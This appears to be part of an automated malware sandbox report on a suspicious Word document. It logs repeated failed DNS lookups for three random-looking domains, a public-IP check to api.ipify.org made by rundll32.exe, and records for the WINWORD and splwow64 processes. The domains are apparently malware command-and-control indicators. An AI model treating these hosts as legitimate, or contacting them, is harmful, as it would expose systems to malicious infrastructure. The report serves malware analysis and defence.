                        Apr 26, 2023 12:40:37.835062981 CEST1.1.1.1192.168.2.20x4b42Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.861350060 CEST1.1.1.1192.168.2.20x6de9Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.181224108 CEST1.1.1.1192.168.2.20x8df9Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.206676960 CEST1.1.1.1192.168.2.20xd479Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.230534077 CEST1.1.1.1192.168.2.20x8cedName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.552418947 CEST1.1.1.1192.168.2.20x2ecfName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.577728987 CEST1.1.1.1192.168.2.20xad07Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.600581884 CEST1.1.1.1192.168.2.20x605cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.087260962 CEST1.1.1.1192.168.2.20xfbd6Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.110192060 CEST1.1.1.1192.168.2.20x815fName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.140203953 CEST1.1.1.1192.168.2.20xafc4Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.567116022 CEST1.1.1.1192.168.2.20x20a3Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.597248077 CEST1.1.1.1192.168.2.20x3bcaName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.623307943 CEST1.1.1.1192.168.2.20xed6dName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.973750114 CEST1.1.1.1192.168.2.20xa85dName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.002796888 CEST1.1.1.1192.168.2.20x1094Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.024929047 CEST1.1.1.1192.168.2.20xb12Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.355159044 CEST1.1.1.1192.168.2.20xc809Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.378177881 CEST1.1.1.1192.168.2.20xa424Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.401407957 CEST1.1.1.1192.168.2.20x8a9cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.738831997 CEST1.1.1.1192.168.2.20x9382Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.762904882 CEST1.1.1.1192.168.2.20x37b9Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.787866116 CEST1.1.1.1192.168.2.20xe1d1Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.090845108 CEST1.1.1.1192.168.2.20xa9c2Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.113626003 CEST1.1.1.1192.168.2.20xe031Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.135936022 CEST1.1.1.1192.168.2.20xc2dName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.444036007 CEST1.1.1.1192.168.2.20x5117Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.469772100 CEST1.1.1.1192.168.2.20xc41aName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.492230892 CEST1.1.1.1192.168.2.20x7d31Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.802911997 CEST1.1.1.1192.168.2.20xdd8bName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.826251984 CEST1.1.1.1192.168.2.20x231aName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.853503942 CEST1.1.1.1192.168.2.20xcf0cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.212874889 CEST1.1.1.1192.168.2.20xc2ebName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.241326094 CEST1.1.1.1192.168.2.20xa6fdName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.270170927 CEST1.1.1.1192.168.2.20x8f9eName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.582838058 CEST1.1.1.1192.168.2.20xf76aName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.605921984 CEST1.1.1.1192.168.2.20xb0adName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.633482933 CEST1.1.1.1192.168.2.20x8a0Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.958575010 CEST1.1.1.1192.168.2.20x9b04Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.981571913 CEST1.1.1.1192.168.2.20xadd2Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.003921032 CEST1.1.1.1192.168.2.20x2a2Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.290258884 CEST1.1.1.1192.168.2.20x132aName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.313549042 CEST1.1.1.1192.168.2.20x561eName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.340131044 CEST1.1.1.1192.168.2.20x8d9aName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.662470102 CEST1.1.1.1192.168.2.20xcff2Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.694881916 CEST1.1.1.1192.168.2.20x1be0Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.716932058 CEST1.1.1.1192.168.2.20x57e2Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.080571890 CEST1.1.1.1192.168.2.20xda0cName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.102775097 CEST1.1.1.1192.168.2.20xc19bName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.137711048 CEST1.1.1.1192.168.2.20x91c5Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.512366056 CEST1.1.1.1192.168.2.20x2e30Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.536534071 CEST1.1.1.1192.168.2.20x153Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.562237978 CEST1.1.1.1192.168.2.20xa5ceName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.900705099 CEST1.1.1.1192.168.2.20x1219Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.924582958 CEST1.1.1.1192.168.2.20x2736Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.950586081 CEST1.1.1.1192.168.2.20x62d8Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.284423113 CEST1.1.1.1192.168.2.20x6960Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.310177088 CEST1.1.1.1192.168.2.20xf74Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.418833971 CEST1.1.1.1192.168.2.20x70d9Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.662261009 CEST1.1.1.1192.168.2.20x2acaName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.749931097 CEST1.1.1.1192.168.2.20x3e20Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.773190975 CEST1.1.1.1192.168.2.20x9a89Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.049410105 CEST1.1.1.1192.168.2.20x7fbName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.072554111 CEST1.1.1.1192.168.2.20x1fc8Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.095721006 CEST1.1.1.1192.168.2.20xeb1eName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.505765915 CEST1.1.1.1192.168.2.20xea7Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.531084061 CEST1.1.1.1192.168.2.20x5009Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.553757906 CEST1.1.1.1192.168.2.20x8c3cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.789335012 CEST1.1.1.1192.168.2.20xc7bcName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.812459946 CEST1.1.1.1192.168.2.20xae9eName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.834851980 CEST1.1.1.1192.168.2.20x175Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.211368084 CEST1.1.1.1192.168.2.20x9b71Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.236119986 CEST1.1.1.1192.168.2.20x4367Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.258780003 CEST1.1.1.1192.168.2.20xad00Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.776082993 CEST1.1.1.1192.168.2.20xaee0Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.807192087 CEST1.1.1.1192.168.2.20x681dName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.831384897 CEST1.1.1.1192.168.2.20x3802Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.171818972 CEST1.1.1.1192.168.2.20x811fName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.197411060 CEST1.1.1.1192.168.2.20x8255Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.224894047 CEST1.1.1.1192.168.2.20x94cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.558142900 CEST1.1.1.1192.168.2.20xb9d3Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.582465887 CEST1.1.1.1192.168.2.20xb0d8Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.609962940 CEST1.1.1.1192.168.2.20x53e2Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.924309015 CEST1.1.1.1192.168.2.20x1c1Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.952579975 CEST1.1.1.1192.168.2.20x51daName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.975481033 CEST1.1.1.1192.168.2.20x35f4Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.288851976 CEST1.1.1.1192.168.2.20xe16fName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.396830082 CEST1.1.1.1192.168.2.20xeb39Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.424974918 CEST1.1.1.1192.168.2.20xb10aName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.727621078 CEST1.1.1.1192.168.2.20xaabdName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.752779961 CEST1.1.1.1192.168.2.20x7779Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.775194883 CEST1.1.1.1192.168.2.20x22abName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.153306961 CEST1.1.1.1192.168.2.20x1d2dName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.202167034 CEST1.1.1.1192.168.2.20xd9a3Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.226310015 CEST1.1.1.1192.168.2.20x6534Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.540467024 CEST1.1.1.1192.168.2.20x107eName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.639211893 CEST1.1.1.1192.168.2.20x991fName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.667124987 CEST1.1.1.1192.168.2.20xefName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.998275042 CEST1.1.1.1192.168.2.20x84c7Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.021219969 CEST1.1.1.1192.168.2.20xf1a0Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.043221951 CEST1.1.1.1192.168.2.20x4f20Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.486870050 CEST1.1.1.1192.168.2.20x971Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.510288000 CEST1.1.1.1192.168.2.20x2514Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.537064075 CEST1.1.1.1192.168.2.20x4374Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.820130110 CEST1.1.1.1192.168.2.20x210cName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.878207922 CEST1.1.1.1192.168.2.20x690dName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.907179117 CEST1.1.1.1192.168.2.20xf536Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.262532949 CEST1.1.1.1192.168.2.20x8326Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.296350956 CEST1.1.1.1192.168.2.20xd821Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.319746017 CEST1.1.1.1192.168.2.20x8d50Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.690046072 CEST1.1.1.1192.168.2.20xbfc9Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.715807915 CEST1.1.1.1192.168.2.20xba82Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.739593983 CEST1.1.1.1192.168.2.20xa7ceName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.091914892 CEST1.1.1.1192.168.2.20x2b58Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.119884968 CEST1.1.1.1192.168.2.20x38f5Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.146445036 CEST1.1.1.1192.168.2.20x150cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.405312061 CEST1.1.1.1192.168.2.20xe464Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.431116104 CEST1.1.1.1192.168.2.20x3ad5Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.454761028 CEST1.1.1.1192.168.2.20xef88Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.893270016 CEST1.1.1.1192.168.2.20xf92bName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.919015884 CEST1.1.1.1192.168.2.20xb26bName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.945333958 CEST1.1.1.1192.168.2.20x4409Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.289617062 CEST1.1.1.1192.168.2.20xdd25Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.405143023 CEST1.1.1.1192.168.2.20x2f98Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.432691097 CEST1.1.1.1192.168.2.20xb2f5Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.856998920 CEST1.1.1.1192.168.2.20x52e8Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.901833057 CEST1.1.1.1192.168.2.20xbe71Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.960994005 CEST1.1.1.1192.168.2.20x9761Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.357189894 CEST1.1.1.1192.168.2.20x9be4Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.394107103 CEST1.1.1.1192.168.2.20x56e2Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.421226025 CEST1.1.1.1192.168.2.20xa2ccName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.714649916 CEST1.1.1.1192.168.2.20xf1afName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.776762009 CEST1.1.1.1192.168.2.20x6bbName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.800337076 CEST1.1.1.1192.168.2.20x2880Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.161516905 CEST1.1.1.1192.168.2.20x2441Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.206511974 CEST1.1.1.1192.168.2.20x25cbName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.241861105 CEST1.1.1.1192.168.2.20x3ac3Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.758904934 CEST1.1.1.1192.168.2.20x64f5Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.782639027 CEST1.1.1.1192.168.2.20x5ecaName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.806416988 CEST1.1.1.1192.168.2.20xedbfName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:57.137777090 CEST1.1.1.1192.168.2.20x3411Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:57.183002949 CEST1.1.1.1192.168.2.20x4481Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:57.210573912 CEST1.1.1.1192.168.2.20xb7cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:57.575145006 CEST1.1.1.1192.168.2.20xc4fdName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:57.599678993 CEST1.1.1.1192.168.2.20xe52dName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:57.651284933 CEST1.1.1.1192.168.2.20x8f51Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.033298016 CEST1.1.1.1192.168.2.20x8cfeName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.064604998 CEST1.1.1.1192.168.2.20x2bf2Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.087986946 CEST1.1.1.1192.168.2.20xc513Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.460395098 CEST1.1.1.1192.168.2.20x4f6bName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.484704971 CEST1.1.1.1192.168.2.20x9369Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.507065058 CEST1.1.1.1192.168.2.20x6bb6Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.845448017 CEST1.1.1.1192.168.2.20xab81Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.867856979 CEST1.1.1.1192.168.2.20xa8f9Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:58.895688057 CEST1.1.1.1192.168.2.20x2ce8Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:59.497261047 CEST1.1.1.1192.168.2.20x50e9Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:59.527731895 CEST1.1.1.1192.168.2.20x7506Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:59.552953959 CEST1.1.1.1192.168.2.20x6bbbName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:00.233386040 CEST1.1.1.1192.168.2.20xe858Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:00.256480932 CEST1.1.1.1192.168.2.20x5a3aName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:00.280560970 CEST1.1.1.1192.168.2.20xfd1Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:00.752991915 CEST1.1.1.1192.168.2.20x2032Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:00.778225899 CEST1.1.1.1192.168.2.20x78bName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:00.803544998 CEST1.1.1.1192.168.2.20x15aName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:01.188276052 CEST1.1.1.1192.168.2.20x6340Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:01.227132082 CEST1.1.1.1192.168.2.20x18baName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:01.253443956 CEST1.1.1.1192.168.2.20xaa0eName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:01.680066109 CEST1.1.1.1192.168.2.20xf853Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:01.704221964 CEST1.1.1.1192.168.2.20x92acName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:01.814575911 CEST1.1.1.1192.168.2.20x4648Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.154725075 CEST1.1.1.1192.168.2.20x6c9eName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.182264090 CEST1.1.1.1192.168.2.20x6f1cName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.209531069 CEST1.1.1.1192.168.2.20xb0e4Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.663341999 CEST1.1.1.1192.168.2.20x41cbName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.687228918 CEST1.1.1.1192.168.2.20x54b5Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.711505890 CEST1.1.1.1192.168.2.20x63d6Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.948169947 CEST1.1.1.1192.168.2.20x1b20Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.971776962 CEST1.1.1.1192.168.2.20x3948Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:02.994791985 CEST1.1.1.1192.168.2.20xa08Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:04.816139936 CEST1.1.1.1192.168.2.20x8125Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:04.839200020 CEST1.1.1.1192.168.2.20x5b35Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:41:04.864212990 CEST1.1.1.1192.168.2.20xe4f2Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • api.ipify.org

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.24975964.185.227.15580C:\Windows\SysWOW64\rundll32.exe
                        TimestampkBytes transferredDirectionData
                        Apr 26, 2023 12:39:09.115633011 CEST46OUTGET / HTTP/1.1
                        Accept: */*
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                        Host: api.ipify.org
                        Cache-Control: no-cache
                        Apr 26, 2023 12:39:09.263889074 CEST46INHTTP/1.1 200 OK
                        Content-Length: 14
                        Content-Type: text/plain
                        Date: Wed, 26 Apr 2023 10:39:09 GMT
                        Vary: Origin
                        Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 34
                        Data Ascii: 102.129.143.14


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:1
                        Start time:12:38:57
                        Start date:26/04/2023
                        Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        Wow64 process (32bit):false
                        Commandline:C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\0524_4109399728218.doc" /o "
                        Imagebase:0x7ff7bdf50000
                        File size:1967408 bytes
                        MD5 hash:D244700A767CE9846760CA8AA9574EDE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Target ID:2
                        Start time:12:39:00
                        Start date:26/04/2023
                        Path:C:\Windows\splwow64.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\splwow64.exe 12288
                        Imagebase:0x7ff759f50000
                        File size:132096 bytes
                        MD5 hash:7FE20527607797A8DADE19838B8B1573
